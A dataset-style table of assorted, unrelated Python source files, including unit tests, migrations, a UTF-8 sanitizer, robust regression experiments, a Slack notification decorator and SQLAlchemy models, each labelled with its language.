content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
from mock import patch
from twisted.trial.unittest import TestCase
from apns.errorresponse import (
ErrorResponse,
ErrorResponseInvalidCodeError,
ErrorResponseInvalidCommandError
)
MODULE = 'apns.errorresponse.'
class ErrorResponseTestCase(TestCase):
CLASS = MODULE + 'ErrorResponse.'
def test_str(self):
resp = ErrorResponse()
resp.name = 'name'
self.assertEqual(str(resp), '<ErrorResponse: name>')
@patch(CLASS + 'CODES', {0: 'invalid token'})
@patch(MODULE + 'struct.unpack')
def test_properties_set(self, unpack_mock):
unpack_mock.return_value = ErrorResponse.COMMAND, 0, 'identifier'
resp = ErrorResponse()
resp.from_binary_string('stream')
self.assertEqual(resp.code, 0)
self.assertEqual(resp.name, 'invalid token')
self.assertEqual(resp.identifier, 'identifier')
@patch(MODULE + 'struct.unpack')
def test_from_binary_string_invalid_command(self, unpack_mock):
unpack_mock.return_value = ErrorResponse.COMMAND + 1, None, None
resp = ErrorResponse()
with self.assertRaises(ErrorResponseInvalidCommandError):
resp.from_binary_string('stream')
@patch(CLASS + 'CODES', {0: 'invalid token'})
@patch(MODULE + 'struct.unpack')
def test_from_binary_string_invalid_code(self, unpack_mock):
unpack_mock.return_value = ErrorResponse.COMMAND, 1, None
resp = ErrorResponse()
with self.assertRaises(ErrorResponseInvalidCodeError):
resp.from_binary_string('stream')
@patch(CLASS + 'CODES', {0: 'invalid token'})
def test_from_binary_string_valid_input(self):
resp = ErrorResponse()
resp.from_binary_string(resp.to_binary_string(0, 123))
self.assertEqual(resp.code, 0)
self.assertEqual(resp.name, 'invalid token')
self.assertEqual(resp.identifier, 123)
| python |
from typing import List
def warmUp(nums: List[int], target: int) -> List[int]:
numsDict = {}
for index, item in enumerate(nums):
diff = target - item
if diff in numsDict:
return numsDict[diff], index
numsDict[item] = index
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = [
'pika',
'twisted',
'checkoutmanager', # The 'collectors' branch of chintal's fork
# 'tendril', # Install this manually
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='tendril-monitor-vcs',
version='0.1.0',
description="VCS monitoring and documentation generation server using "
"Twisted for Tendril",
long_description=readme,
author="Chintalagiri Shashank",
author_email='[email protected]',
url='https://github.com/chintal/tendril-monitor-vcs',
packages=[
'vcs_monitor',
],
package_dir={'vcs_monitor': 'vcs_monitor'},
include_package_data=True,
install_requires=requirements,
license="MIT",
zip_safe=False,
keywords='tendril-monitor-vcs',
classifiers=[
'Development Status :: 4 - Beta',
"License :: OSI Approved :: MIT License",
'Natural Language :: English',
'Programming Language :: Python',
],
test_suite='tests',
tests_require=test_requirements
)
| python |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Add function to convert string to bucket
Revision ID: 4ec0adada10
Revises: 9177113533
Create Date: 2015-09-06 19:32:50.438462
"""
from alembic import op
revision = "4ec0adada10"
down_revision = "9177113533"
def upgrade():
op.execute(
"""
CREATE FUNCTION sitemap_bucket(text) RETURNS text AS $$
SELECT substring(
encode(digest($1, 'sha512'), 'hex')
from 1
for 1
)
$$
LANGUAGE SQL
IMMUTABLE
RETURNS NULL ON NULL INPUT;
"""
)
def downgrade():
op.execute("DROP FUNCTION sitemap_bucket(text)")
| python |
from fastapi import APIRouter
from kairon.api.auth import Authentication
from kairon.api.processor import AccountProcessor
from kairon.api.models import Response, User
from fastapi import Depends
router = APIRouter()
auth = Authentication()
@router.get("/details", response_model=Response)
async def get_users_details(current_user: User = Depends(auth.get_current_user)):
"""
returns the details of the current logged-in user
"""
return {
"data": {"user": AccountProcessor.get_complete_user_details(current_user.email)}
}
| python |
import time
from slacker import Slacker
from script.util.BaseFSM import BaseFSM
from script.util.misc_util import error_trace
class SlackBotFsm(BaseFSM):
def __init__(self):
super().__init__()
self.add_state('pending', initial_state=True)
self.add_state('on going')
self.add_state('finish')
self.add_state('error')
self.add_event('raise_error', 'pending', 'error')
self.add_event('start', 'pending', 'on going')
self.add_event('raise_error', 'on going', 'error')
self.add_event('finish', 'on going', 'finish')
self.add_event('raise_error', 'finish', 'error')
def start(self):
self.start()
def raise_error(self):
self.raise_error()
def finish(self):
self.finish()
def test_slack_bot_fsm():
fsm = SlackBotFsm()
print(fsm.state)
fsm.start()
print(fsm.state)
fsm.raise_error()
print(fsm.state)
fsm.finish()
print(fsm.state)
class SlackBot:
def __init__(self, token_path=None, channel=None):
self.token_path = token_path
self.channel = channel
self.slacker = Slacker(self._get_token(self.token_path))
def _get_token(self, token_path):
with open(token_path, 'r') as f:
token = f.readlines()
return token
def post_message(self, msg, attachments=None):
# TODO to make usable
if attachments:
attachments_dict = dict()
attachments_dict['pretext'] = "pretext attachments 블록 전에 나타나는 text"
attachments_dict['title'] = "title 다른 텍스트 보다 크고 볼드되어서 보이는 title"
attachments_dict['title_link'] = "https://corikachu.github.io"
attachments_dict['fallback'] = "클라이언트에서 노티피케이션에 보이는 텍스트 입니다. attachment 블록에는 나타나지 않습니다"
attachments_dict['text'] = "본문 텍스트! 5줄이 넘어가면 *show more*로 보이게 됩니다."
attachments_dict['mrkdwn_in'] = ["text", "pretext"] # 마크다운을 적용시킬 인자들을 선택합니다.
attachments = [attachments_dict]
self.slacker.chat.post_message(channel=self.channel, text='tetsetseetsetset', attachments=attachments)
else:
self.slacker.chat.post_message(self.channel, msg)
def test_SlackBot():
bot = SlackBot()
bot.post_message('hello world')
def deco_slackbot(token_path, channel):
def _deco_slack_bot(func):
def wrapper(*args, **kwargs):
start = time.time()
try:
ret = func(*args, **kwargs)
except BaseException as e:
print(error_trace(e))
ret = None
elapse_time = time.time() - start
try:
bot = SlackBot(token_path, channel)
msg = f"in {func.__name__}(), time {elapse_time:.4f}'s elapsed"
bot.post_message(msg)
except BaseException as e:
print(error_trace(e))
print('slackbot fail to post message')
return ret
wrapper.__name__ = func.__name__
return wrapper
return _deco_slack_bot
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# rom.py
#
# Part of MARK II project. For informations about license, please
# see file /LICENSE .
#
# author: Vladislav Mlejnecký
# email: [email protected]
from memitem import memitem
import sys
import mif
class rom(memitem):
def __init__(self, baseAddress, size, rom0mif, name):
memitem.__init__(self, baseAddress, size, name)
self.loadmif(rom0mif)
def loadmif(self, fileName):
miffile = mif.mif(mif.READ, fileName)
if miffile.read() == mif.OK:
for item in miffile.outBuff:
self.mem[item.address] = item.value
else:
print "Error in " + self.__name__ + "! Can't can't read input file <" + fileName + ">!"
print miffile.errmsg
sys.exit(1)
| python |
#! /usr/bin/env python
# -*- coding:utf-8; mode:python -*-
from ilcli import Command
class FirstDemoCommand(Command):
ignore_arguments = ['-b']
def _init_arguments(self):
super()._init_arguments()
self.add_argument('--foo')
class SecondDemoCommand(FirstDemoCommand):
ignore_arguments = ['--bar', '--foo']
class ThirdDemoCommand(FirstDemoCommand):
ignore_arguments = ['bat']
class Parent(Command):
subcommands = [FirstDemoCommand, SecondDemoCommand, ThirdDemoCommand]
def _init_arguments(self):
self.add_argument('-b', '--bar')
self.add_argument('bat')
if __name__ == '__main__':
exit(Parent().run())
| python |
r"""UTF-8 sanitizer.
Python's UTF-8 parser is quite relaxed, this creates problems when
talking with other software that uses stricter parsers.
>>> _norm(safe_utf8_decode(b"foobar"))
(True, ['f', 'o', 'o', 'b', 'a', 'r'])
>>> _norm(safe_utf8_decode(b'X\0Z'))
(False, ['X', 65533, 'Z'])
>>> _norm(safe_utf8_decode(b'OK'))
(True, ['O', 'K'])
>>> _norm(safe_utf8_decode(b'X\xF1Y'))
(False, ['X', 65533, 'Y'])
>>> _norm_str(sanitize_unicode(u'\uD801\uDC01'))
[66561]
>>> sanitize_unicode(b'qwe')
Traceback (most recent call last):
...
TypeError: Need unicode string
"""
## these give different results in py27 and py35
# >>> _norm(safe_utf8_decode(b'X\xed\xa0\x80Y\xed\xb0\x89Z'))
# (False, ['X', 65533, 65533, 65533, 'Y', 65533, 65533, 65533, 'Z'])
# >>> _norm(safe_utf8_decode(b'X\xed\xa0\x80\xed\xb0\x89Z'))
# (False, ['X', 65533, 65533, 65533, 65533, 65533, 65533, 'Z'])
# from __future__ import division, absolute_import, print_function
import re
import codecs
try:
unichr
except NameError:
unichr = chr # noqa
unicode = str # noqa
def _norm_char(uchr):
code = ord(uchr)
if code >= 0x20 and code < 0x7f:
return chr(code)
return code
def _norm_str(ustr):
return [_norm_char(c) for c in ustr]
def _norm(tup):
flg, ustr = tup
return (flg, _norm_str(ustr))
__all__ = ['safe_utf8_decode']
# by default, use same symbol as 'replace'
REPLACEMENT_SYMBOL = unichr(0xFFFD) # 65533
def _fix_utf8(m):
"""Merge UTF16 surrogates, replace others"""
u = m.group()
if len(u) == 2:
# merge into single symbol
c1 = ord(u[0])
c2 = ord(u[1])
c = 0x10000 + ((c1 & 0x3FF) << 10) + (c2 & 0x3FF)
return unichr(c)
else:
# use replacement symbol
return REPLACEMENT_SYMBOL
_urc = None
def sanitize_unicode(u):
"""Fix invalid symbols in unicode string."""
global _urc
if not isinstance(u, unicode):
raise TypeError('Need unicode string')
# regex for finding invalid chars, works on unicode string
if not _urc:
rx = u"[\uD800-\uDBFF] [\uDC00-\uDFFF]? | [\0\uDC00-\uDFFF]"
_urc = re.compile(rx, re.X)
# now find and fix UTF16 surrogates
m = _urc.search(u)
if m:
u = _urc.sub(_fix_utf8, u)
return u
def safe_replace(exc):
"""Replace only one symbol at a time.
Builtin .decode('xxx', 'replace') replaces several symbols
together, which is unsafe.
"""
c2 = REPLACEMENT_SYMBOL
# we could assume latin1
#if 0:
# c1 = exc.object[exc.start]
# c2 = unichr(ord(c1))
return c2, exc.start + 1
# register, it will be globally available
codecs.register_error("safe_replace", safe_replace)
def safe_utf8_decode(s):
"""Decode UTF-8 safely.
Acts like str.decode('utf8', 'replace') but also fixes
UTF16 surrogates and NUL bytes, which Python's default
decoder does not do.
@param s: utf8-encoded byte string
@return: tuple of (was_valid_utf8, unicode_string)
"""
# decode with error detection
ok = True
try:
# expect no errors by default
u = s.decode('utf8')
except UnicodeDecodeError:
u = s.decode('utf8', 'safe_replace')
ok = False
u2 = sanitize_unicode(u)
if u is not u2:
ok = False
return (ok, u2)
| python |
#! /usr/local/bin/python3
import operator
import sys
from collections import deque
from math import prod
pubKeys = [int(x) for x in sys.stdin.read().split("\n")[:2]]
subject = [1 for i in pubKeys]
print(pubKeys)
handDivisor = 20201227
acc = [0 for i in pubKeys]
for i, k in enumerate(pubKeys):
while k != subject[i]:
acc[i] += 1
subject[i] = (subject[i] * 7) % handDivisor
print(acc)
print(pow(pubKeys[0], acc[1], handDivisor), pow(pubKeys[0], acc[1], handDivisor))
| python |
import sys
import os
sys.path.append(os.path.join('..','utils'))
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from utilsRobust import *
######################
### VARIOUS TESTS FOR UTILS ROBUST
######################
def test_mestimate():
mean = 0
std = 5
x = np.arange(1000)
y = np.random.normal(mean, std, x.size)
ones = np.ones(shape=(x.size))
# add large outliers
# numOutliers = 450
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
y[index] = np.random.randint(std*4, std*20)
# compute mean
mean = np.average(y)
standardDev = np.std(y)
# compute mad
med = sampleMedian(y)
mad = sampleMAD(y)
# mestimates
mestLocation, mestScale = mestimate(y)
# plot
plt.figure()
plt.scatter(x, y, color='y')
plt.plot(x, ones*mean, lw = 2, color="b", label="mean")
plt.plot(x, ones*standardDev, lw = 2, color="b", ls="dashed")
plt.plot(x, ones*med, lw = 2, color="g", label="median")
plt.plot(x, ones*mad, lw = 2, color="g", ls="dashed")
plt.plot(x, ones*mestLocation, lw = 2, color="r", label="mest")
plt.plot(x, ones*mestScale, lw = 2, color="r", ls="dashed")
plt.legend()
plt.show()
def test_mestimateModel():
# let's generate some data
x = np.arange(1000)
y = np.arange(-50, 50, 0.1)
# create a linear function of this
z = 2.5*x + y
# let's add some noise
mean = 0
std = 3
noise = np.random.normal(0, 3, x.size)
# print noise.shape
z = z + noise
# now add some outliers
numOutliers = 80
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
z[index] = np.random.randint(std*4, std*20)
A = np.transpose(np.vstack((x, y)))
# now try and do a robust regression
components = mestimateModel(A, z)
print components
# plt.figure()
# plt.plot()
def testRobustRegression():
# random seed
np.random.seed(0)
# the function
x = np.arange(150)
y = 12 + 0.5*x
# noise
mean = 0
std = 3
noise = np.random.normal(mean, 3*std, x.size)
# add noise
yNoise = y + noise
# now add some outliers
numOutliers = 30
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
yNoise[index] = yNoise[index] + np.random.randint(-1000, 1000)
# now add some outliers
xNoise = np.array(x)
numOutliers = 30
for i in xrange(0, numOutliers):
index = np.random.randint(0, x.size)
xNoise[index] = x[index] + np.random.randint(-5000, 5000)
xNoise = xNoise.reshape((x.size,1))
# lets use m estimate
paramsM, residsM, scaleM, weightsM = mestimateModel(xNoise, yNoise, intercept=True)
# lets use mm estimate
paramsMM, residsMM, scaleMM, weightsMM = mmestimateModel(xNoise, yNoise, intercept=True)
# lets test chatterjee machler
paramsCM, residsCM, weightsCM = chatterjeeMachler(xNoise, yNoise, intercept=True)
# lets test chatterjee machler mod
paramsModCM, residsModCM, weightsModCM = chatterjeeMachlerMod(xNoise, yNoise, intercept=True)
# let's plot Pdiag
plt.figure()
n, bins, patches = plt.hist(Pdiag, 50, normed=0, facecolor='green', alpha=0.75)
# try and predict
yM = paramsM[0] + paramsM[1]*x
yMM = paramsMM[0] + paramsMM[1]*x
yCM = paramsCM[0] + paramsCM[1]*x
yCM_mod = paramsModCM[0] + paramsModCM[1]*x
plt.figure()
plt.scatter(x, y, marker="s", color="black")
plt.scatter(xNoise, yNoise)
plt.plot(x, yM)
plt.plot(x, yMM)
plt.plot(x, yCM)
plt.plot(x, yCM_mod)
plt.legend(["M estimate", "MM estimate", "chatterjeeMachler", "chatterjeeMachlerMod"], loc="lower left")
plt.show()
def testRobustRegression2D():
# random seed
np.random.seed(0)
numPts = 300
# the function
x1 = np.arange(numPts, dtype="float")
x2 = 10*np.cos(2.0*np.pi*10*x1/np.max(x1))
y = 12 + 0.5*x1 + 3*x2
# noise
mean = 0
std = 3
noise = np.random.normal(mean, 3*std, numPts)
# add noise
yNoise = y + noise
# now add some outliers
numOutliers = 140
for i in xrange(0, numOutliers):
index = np.random.randint(0, numPts)
yNoise[index] = yNoise[index] + np.random.randint(-100, 100)
# now add some outliers
x1Noise = np.array(x1)
x2Noise = np.array(x2)
numOutliers = 5
for i in xrange(0, numOutliers):
index = np.random.randint(0, numPts)
x1Noise[index] = x1[index] + np.random.randint(-500, 500)
index = np.random.randint(0, numPts)
x2Noise[index] = x2[index] + np.random.randint(-500, 500)
x1Noise = x1Noise.reshape((x1.size,1))
x2Noise = x2Noise.reshape((x2.size,1))
X = np.hstack((x1Noise, x2Noise))
# lets use m estimate
paramsM, residsM, scaleM, weightsM = mestimateModel(X, yNoise, intercept=True)
# lets use mm estimate
paramsMM, residsMM, scaleMM, weightsMM = mmestimateModel(X, yNoise, intercept=True)
# lets test chatterjee machler
paramsCM, residsCM, weightsCM = chatterjeeMachler(X, yNoise, intercept=True)
# lets test chatterjee machler mod
paramsModCM, residsModCM, weightsModCM = chatterjeeMachlerMod(X, yNoise, intercept=True)
# lets test chatterjee machler hadi
paramsCMHadi, residsCMHadi, weightsCMHadi = chatterjeeMachlerHadi(X, yNoise, intercept=True)
# try and predict
yM = paramsM[0] + paramsM[1]*x1 + paramsM[2]*x2
yMM = paramsMM[0] + paramsMM[1]*x1 + paramsMM[2]*x2
yCM = paramsCM[0] + paramsCM[1]*x1 + paramsCM[2]*x2
yCM_mod = paramsModCM[0] + paramsModCM[1]*x1 + paramsModCM[2]*x2
yCM_Hadi = paramsCMHadi[0] + paramsCMHadi[1]*x1 + paramsCMHadi[2]*x2
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x1, x2, y, marker="s", color="black")
ax.scatter(x1Noise, x2Noise, yNoise, marker="*", s=50, color="goldenrod")
# plt.plot(x1, x2, zs=yM)
plt.plot(x1, x2, zs=yMM)
# plt.plot(x1, x2, zs=yCM)
plt.plot(x1, x2, zs=yCM_mod)
# plt.plot(x1, x2, zs=yCM_Hadi)
# plt.legend(["M estimate", "MM estimate", "chatterjeeMachler", "chatterjeeMachlerMod", "chatterjeeMachlerHadi"], loc="lower left")
plt.legend(["MM estimate", "chatterjeeMachlerMod"], loc="lower left")
plt.show()
#test_mestimate()
# test_mestimateModel()
# testRobustRegression()
testRobustRegression2D() | python |
import numpy as np
from scratch.abstract import AbstractModel
class PCA(AbstractModel):
def __init__(self):
pass
@staticmethod
def normalizing(v):
return (v - np.mean(v)) / np.std(v)
def fit(self, X):
# step 1: normalizing
Xarray = X.to_numpy()
self.Xscale = np.apply_along_axis(self.normalizing, 0, Xarray)
# step 2: compute covariances
Xcov = np.cov(self.Xscale.T)
# step 3: compute eigenvalues and eigenvectors
eigenvalues, eigenvectors = np.linalg.eig(Xcov)
eigenvectors = eigenvectors.T
# step 4: construct feature vector
idx = np.flip(np.argsort(eigenvalues))
self.eigenvalues = eigenvalues[idx]
self.eigenvectors = eigenvectors[idx]
def predict(self):
return np.dot(self.Xscale, self.eigenvectors.T)
| python |
from django.db import models
class Like(model.Models):
uid = models.IntegerField()
name = models.CharField()
# Create your models here.
| python |
import numpy as np
import pytest
import tensorflow as tf
from tensorflow.keras.layers import Dense, Input, InputLayer
from alibi_detect.cd.preprocess import UAE, HiddenOutput, pca
n, n_features, n_classes, latent_dim, n_hidden = 100, 10, 5, 2, 7
shape = (n_features,)
X = np.random.rand(n * n_features).reshape(n, n_features).astype('float32')
encoder_net = tf.keras.Sequential(
[
InputLayer(input_shape=(n_features,)),
Dense(latent_dim)
]
)
tests_uae = [encoder_net, latent_dim]
n_tests_uae = len(tests_uae)
@pytest.fixture
def uae_params(request):
return tests_uae[request.param]
@pytest.mark.parametrize('uae_params', list(range(n_tests_uae)), indirect=True)
def test_uae(uae_params):
enc = uae_params
if isinstance(enc, tf.keras.Sequential):
encoder_net, enc_dim = enc, None
elif isinstance(enc, int):
encoder_net, enc_dim = None, enc
X_enc = UAE(encoder_net=encoder_net, shape=X.shape[1:], enc_dim=enc_dim)(X)
assert X_enc.shape == (n, latent_dim)
class Model1(tf.keras.Model):
def __init__(self):
super(Model1, self).__init__()
self.dense1 = Dense(n_hidden)
self.dense2 = Dense(n_classes, activation='softmax')
def call(self, x: np.ndarray) -> tf.Tensor:
x = self.dense1(x)
return self.dense2(x)
def model2():
x_in = Input(shape=shape)
x = Dense(n_hidden)(x_in)
x_out = Dense(n_classes, activation='softmax')(x)
return tf.keras.models.Model(inputs=x_in, outputs=x_out)
tests_hidden_output = [
(1, -2, shape),
(1, -1, shape),
(2, -2, None),
(2, -1, None),
(2, -1, shape)
]
n_tests_hidden_output = len(tests_hidden_output)
@pytest.fixture
def hidden_output_params(request):
return tests_hidden_output[request.param]
@pytest.mark.parametrize('hidden_output_params', list(range(n_tests_hidden_output)), indirect=True)
def test_hidden_output(hidden_output_params):
model, layer, input_shape = hidden_output_params
model = Model1() if model == 1 else model2()
X_hidden = HiddenOutput(model=model, layer=layer, input_shape=input_shape)(X)
if layer == -2:
assert X_hidden.shape == (n, n_hidden)
elif layer == -1:
assert X_hidden.shape == (n, n_classes)
tests_pca = [2, 4]
n_tests_pca = len(tests_pca)
@pytest.fixture
def pca_params(request):
return tests_pca[request.param]
@pytest.mark.parametrize('pca_params', list(range(n_tests_pca)), indirect=True)
def test_pca(pca_params):
n_components = pca_params
X_pca = pca(X, n_components)
assert X_pca.shape[-1] == n_components
| python |
# Generated by Django 2.1.3 on 2019-02-27 15:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('queueapp', '0007_auto_20190220_1642'),
]
operations = [
migrations.AddField(
model_name='queue',
name='pause_and_clear',
field=models.BooleanField(default=False),
),
]
| python |
import re
import sys
import unittest
from line import *
from canonicalLine import *
from degenerateLine import *
from lineClassifier import *
import importlib
pd.set_option('display.width', 1000)
filename = "../testData/daylight_1_4.eaf"
xmlDoc = etree.parse(filename)
lineCount = len(xmlDoc.findall("TIER/ANNOTATION/ALIGNABLE_ANNOTATION"))
assert(lineCount == 4)
htmlDoc = Doc()
htmlDoc.asis('<!DOCTYPE html>')
with htmlDoc.tag('html', lang="en"):
with htmlDoc.tag('head'):
htmlDoc.asis('<meta charset="UTF-8">')
htmlDoc.asis('<link rel="stylesheet" href="ijal.css">')
with htmlDoc.tag('body'):
for i in range(lineCount):
x = Line(xmlDoc, i)
with htmlDoc.tag("div", klass="line-wrapper"):
with htmlDoc.tag("div", klass="line-sidebar"):
htmlDoc.text("%d)" % (i + 1))
htmlDoc.asis('<img src="https://www.americanlinguistics.org/wp-content/uploads/speaker.png"></img>')
classifier = LineClassifier(x.getTable())
classification = classifier.run()
print("%d: %s" % (i, classification))
if(classification == "CanonicalLine"):
xc = CanonicalLine(xmlDoc, i)
xc.toHtml(htmlDoc)
elif(classification == "DegenerateLine"):
xd = DegenerateLine(xmlDoc, i)
xd.toHtml(htmlDoc)
htmlDoc.asis("<p><hr><p>")
htmlText = htmlDoc.getvalue()
filename = "daylight.html"
f = open(filename, "w")
f.write(indent(htmlText))
f.close()
os.system("open %s" % filename)
| python |
# pylint:disable=missing-module-docstring,missing-class-docstring,missing-function-docstring
from .base import compare_template, SimpleTestCase
class CopyButtonTest(SimpleTestCase):
maxDiff = None
def test_rendered(self):
template = """
{% load carbondesign %}
{% CopyButton %}
"""
expected = """
<button data-copy-btn class="bx--copy-btn" type="button" tabindex="0">
<span class="bx--assistive-text bx--copy-btn__feedback">Copied!</span>
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--snippet__icon" width="16" height="16" viewBox="0 0 32 32"
aria-hidden="true">
<path d="M28,10V28H10V10H28m0-2H10a2,2,0,0,0-2,2V28a2,2,0,0,0,2,2H28a2,2,0,0,0,2-2V10a2,2,0,0,0-2-2Z"></path>
<path d="M4,18H2V4A2,2,0,0,1,4,2H18V4H4Z"></path>
</svg>
</button>
"""
rendered = compare_template(template, expected)
self.assertEqual(*rendered)
| python |
# These should probably all live in separate files
from ..tensorboard_writer import TensorboardWriter
from allennlp.training.callbacks.events import Events
from allennlp.training.callbacks.callback import Callback, handle_event
from allennlp.common.params import Params
import logging
from typing import Set, Dict, TYPE_CHECKING
if TYPE_CHECKING:
from allennlp.training.callback_trainer import CallbackTrainer
logger = logging.getLogger(__name__)
@Callback.register('tensorboard_logging')
class TensorboardLogger(Callback):
def __init__(self, tensorboard: TensorboardWriter):
self.tensorboard = tensorboard
@handle_event(Events.TRAINING_START)
def training_start(self, trainer: "CallbackTrainer") -> None:
# This is an ugly hack to get the tensorboard instance to know about the trainer, because
# the callbacks are defined before the trainer.
self.tensorboard._get_batch_num_total = lambda: trainer.batch_num_total
@handle_event(Events.BATCH_END)
def batch_end_logging(self, trainer: "CallbackTrainer"):
if self.tensorboard.should_log_this_batch():
self.tensorboard.log_histograms(trainer.model)
self.tensorboard.log_scalars(trainer.model)
@classmethod
def from_params( # type: ignore
cls, serialization_dir: str,
params: Params) -> "TensorboardLogger":
tensorboard = TensorboardWriter.from_params(
params=params,
serialization_dir=serialization_dir,
get_batch_num_total=lambda: None)
return cls(tensorboard)
| python |
from datetime import datetime
from decimal import Decimal
import calendar
from enum import IntEnum
import timex
from sqlalchemy import event
from sqlalchemy import and_, or_
from sqlalchemy import literal_column
from sqlalchemy import Column, Table, ForeignKey, Index, UniqueConstraint
from sqlalchemy import Float, Boolean, Text, DateTime, Integer, String
from sqlalchemy import cast, null, case
from sqlalchemy.orm.interfaces import PropComparator
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.dialects.mysql import DECIMAL
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import composite
from sqlalchemy.orm import backref
from sqlalchemy.orm import relationship
from sqlalchemy.orm.collections import attribute_mapped_collection
from sqlalchemy.types import TypeDecorator, DATETIME
class Datatype(IntEnum):
none = 0
string = 1
int = 2
float = 3
datetime = 4
timerange = 5
class StreamState(IntEnum):
active = 1
firing = 2
expiring = 3
error = 4
expire_error = 5
completed = 6
retry_fire = 7
retry_expire = 8
class DBException(Exception):
pass
class InvalidTraitType(DBException):
pass
def dt_to_decimal(dt):
t_sec = calendar.timegm(dt.utctimetuple()) + (dt.microsecond/1e6)
return Decimal("%.6f" % t_sec)
def decimal_to_dt(decimal_timestamp):
return datetime.utcfromtimestamp(float(decimal_timestamp))
class PreciseTimestamp(TypeDecorator):
"""Represents a timestamp precise to the microsecond."""
impl = DATETIME
def load_dialect_impl(self, dialect):
if dialect.name == 'mysql':
return dialect.type_descriptor(DECIMAL(precision=20,
scale=6,
asdecimal=True))
return dialect.type_descriptor(DATETIME())
def process_bind_param(self, value, dialect):
if value is None:
return value
elif dialect.name == 'mysql':
return dt_to_decimal(value)
return value
def process_result_value(self, value, dialect):
if value is None:
return value
elif dialect.name == 'mysql':
return decimal_to_dt(value)
return value
class DBTimeRange(object):
def __init__(self, begin, end):
self.begin = begin
self.end = end
def __composite_values__(self):
return self.begin, self.end
def __repr__(self):
return "DBTimeRange(begin=%r, end=%r)" % (self.begin, self.end)
def __eq__(self, other):
return isinstance(other, DBTimeRange) and \
other.begin == self.begin and \
other.end == self.end
def __ne__(self, other):
return not self.__eq__(other)
class ProxiedDictMixin(object):
"""Adds obj[name] access to a mapped class.
This class basically proxies dictionary access to an attribute
called ``_proxied``. The class which inherits this class
should have an attribute called ``_proxied`` which points to a dictionary.
"""
def __len__(self):
return len(self._proxied)
def __iter__(self):
return iter(self._proxied)
def __getitem__(self, name):
return self._proxied[name]
def __contains__(self, name):
return name in self._proxied
def __setitem__(self, name, value):
self._proxied[name] = value
def __delitem__(self, name):
del self._proxied[name]
class PolymorphicVerticalProperty(object):
"""A name/value pair with polymorphic value storage."""
ATTRIBUTE_MAP = {Datatype.none: None}
PY_TYPE_MAP = {unicode: Datatype.string,
int: Datatype.int,
float: Datatype.float,
datetime: Datatype.datetime,
DBTimeRange: Datatype.timerange}
def __init__(self, name, value=None):
self.name = name
self.value = value
@classmethod
def get_type_value(cls, value):
if value is None:
return Datatype.none, None
if isinstance(value, str):
value = value.decode('utf8', 'ignore')
if isinstance(value, timex.Timestamp):
value = value.timestamp
if isinstance(value, timex.TimeRange):
value = DBTimeRange(value.begin, value.end)
if type(value) in cls.PY_TYPE_MAP:
return cls.PY_TYPE_MAP[type(value)], value
return None, value
@hybrid_property
def value(self):
if self.type not in self.ATTRIBUTE_MAP:
raise InvalidTraitType("Invalid trait type in db for %s: %s" % (self.name, self.type))
attribute = self.ATTRIBUTE_MAP[self.type]
if attribute is None:
return None
if self.type == Datatype.timerange:
val = getattr(self, attribute)
return timex.TimeRange(val.begin, val.end)
else:
return getattr(self, attribute)
@value.setter
def value(self, value):
datatype, value = self.get_type_value(value)
if datatype not in self.ATTRIBUTE_MAP:
raise InvalidTraitType("Invalid trait type for %s: %s" % (self.name, datatype))
attribute = self.ATTRIBUTE_MAP[datatype]
self.type = int(datatype)
if attribute is not None:
setattr(self, attribute, value)
@value.deleter
def value(self):
self._set_value(None)
@value.comparator
class value(PropComparator):
"""A comparator for .value, builds a polymorphic comparison.
"""
def __init__(self, cls):
self.cls = cls
def __eq__(self, other):
dtype, value = self.cls.get_type_value(other)
if dtype is None:
dtype = Datatype.string
if dtype == Datatype.none:
return self.cls.type == int(Datatype.none)
attr = getattr(self.cls, self.cls.ATTRIBUTE_MAP[dtype])
return and_(attr == value, self.cls.type == int(dtype))
def __ne__(self, other):
dtype, value = self.cls.get_type_value(other)
if dtype is None:
dtype = Datatype.string
if dtype == Datatype.none:
return self.cls.type != int(Datatype.none)
attr = getattr(self.cls, self.cls.ATTRIBUTE_MAP[dtype])
return and_(attr != value, self.cls.type == int(dtype))
def __repr__(self):
return '<%s %r=%r>' % (self.__class__.__name__, self.name, self.value)
Base = declarative_base()
class Trait(PolymorphicVerticalProperty, Base):
__tablename__ = 'trait'
__table_args__ = (
Index('ix_trait_t_int', 't_int'),
Index('ix_trait_t_string', 't_string'),
Index('ix_trait_t_datetime', 't_datetime'),
Index('ix_trait_t_float', 't_float'),
)
event_id = Column(Integer, ForeignKey('event.id'), primary_key=True)
name = Column(String(100), primary_key=True)
type = Column(Integer)
ATTRIBUTE_MAP = {Datatype.none: None,
Datatype.string: 't_string',
Datatype.int: 't_int',
Datatype.float: 't_float',
Datatype.datetime: 't_datetime',}
t_string = Column(String(255), nullable=True, default=None)
t_float = Column(Float, nullable=True, default=None)
t_int = Column(Integer, nullable=True, default=None)
t_datetime = Column(PreciseTimestamp(),
nullable=True, default=None)
def __repr__(self):
return "<Trait(%s) %s=%s/%s/%s/%s on %s>" % (self.name,
self.type,
self.t_string,
self.t_float,
self.t_int,
self.t_datetime,
self.event_id)
class EventType(Base):
"""Types of event records."""
__tablename__ = 'event_type'
id = Column(Integer, primary_key=True)
desc = Column(String(255), unique=True)
def __init__(self, event_type):
self.desc = event_type
def __repr__(self):
return "<EventType: %s>" % self.desc
